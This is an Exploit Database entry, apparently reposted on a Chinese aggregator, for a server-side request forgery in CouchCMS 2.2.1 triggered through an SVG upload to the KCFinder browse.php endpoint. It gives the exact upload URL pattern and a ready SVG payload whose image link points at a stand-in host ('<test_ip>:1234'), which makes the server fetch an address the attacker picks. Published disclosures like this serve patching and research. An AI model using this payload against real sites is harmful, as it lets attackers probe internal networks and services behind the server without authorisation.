CouchCMS 2.2.1 – Server-Side Request Forgery

• Exploit Database
• 16 阅读

• 作者： xxcdd
  日期： 2021-03-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49675/

• # Exploit Title: CouchCMS 2.2.1 - SSRF via SVG file upload
  # Date: 2021-01-25
  # Exploit Author: xxcdd
  # Vendor Homepage: https://github.com/CouchCMS/CouchCMS
  # Software Link: https://github.com/CouchCMS/CouchCMS
  # Version: v2.2.1
  # Tested on: Windows 7
  
  An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows SSRF via an /couch/includes/kcfinder/browse.php SVG upload.
  
  upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en
  
  ssrf.svg content:
  
  <?xml version="1.0" encoding="UTF-8" standalone="no"?>
  <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="
  http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="200" height="200">
  <image height="200" width="200" xlink:href="http://<test_ip>:1234" />
  </svg>